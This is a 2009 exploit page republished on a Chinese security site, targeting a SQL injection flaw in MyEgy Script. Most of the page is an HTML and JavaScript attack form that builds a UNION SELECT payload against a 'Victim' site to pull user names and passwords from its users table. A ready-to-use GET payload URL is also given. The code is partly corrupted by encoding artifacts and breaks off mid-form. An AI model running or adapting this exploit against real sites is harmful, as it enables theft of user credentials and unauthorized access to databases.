首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MyEgy Script suffers from a remote SQL injection vulnerability
来源:ahmed_sheko998[at]yahoo.com 作者:Sheko 发布时间:2009-07-01  

<html>
<!--
Script Name :MyEgy Script
Authur : Karar alShaMi & Sheko (El3akrab Elmodamer)
Email :牋 K4rar@yahoo.com??ahmed_sheko998@yahoo.com
Demo : http://www.7obonlin.com
Exploit : Write the site in (Victim) field then submit the form :)
AdminCp : /?do=login
Note : each color of myegy script have a different columns number so try to change the (Columns number) field
to 6 or 7 or 9 if the exploit failed with 8 :)
Note 2 : We Can Use Get Method To Exploit This Vulnerability
See line 64 $cat = $_REQUEST['c'];
So we Can Exploit it in this way
http://localhost/myegy/?c=[Sql]
[Sql] = -1+union+select+1,2,3,4,concat(name,0x3a,password),6,7,8+from+users--
//-->
<head><title>MyEgy Explo!t</title>
<style type="text/css">
..style1 {
爐ext-align: center;
}
</style>
</head>
<body>
<script language="Javascript">
function doit(si,co){
爁or(var n =1;n<co;n++){
爄f(tmp){
爒ar tmp = tmp+n+",";
?}else{
爒ar爐mp = n+",";

?}
tmp =tmp.replace(5,"concat(name,0x3a,password)");
document.f0.action=si+'/';
document.f0.c.value='-1/**/union/**/select/**/'+tmp+co+'/**/from/**/users--';
document.f0.submit;
}
</script>
<form name="f0" method="post">
<p class="style1">My Egy Explo!t</p>
<p class="style1">By : Karar alShaMi &amp; Sheko</p>
<p class="style1">Victim: <input name="site" type="text" style="width: 253px" value="


     


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Messages Library 2.0 Arbitrary
·SMF Mod Member Awards 1.0.2 Bl
·TFM MMPlayer 2.0 (m3u/ppl) Uni
·MP3-Nator 2.0 (plf File) Unive
·PEamp 1.02b (.M3U File) Local
·Messages Library 2.0 Arbitrary
·phpFanfiction remote SQL injec
·AudioPLUS 2.00.215 (.lst & .m3
·Versions 1.0.1 and below of th
·Green Dam Remote Change System
·Versions 1.1 and below of the
·ARD-9808 DVR Card Security Cam
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved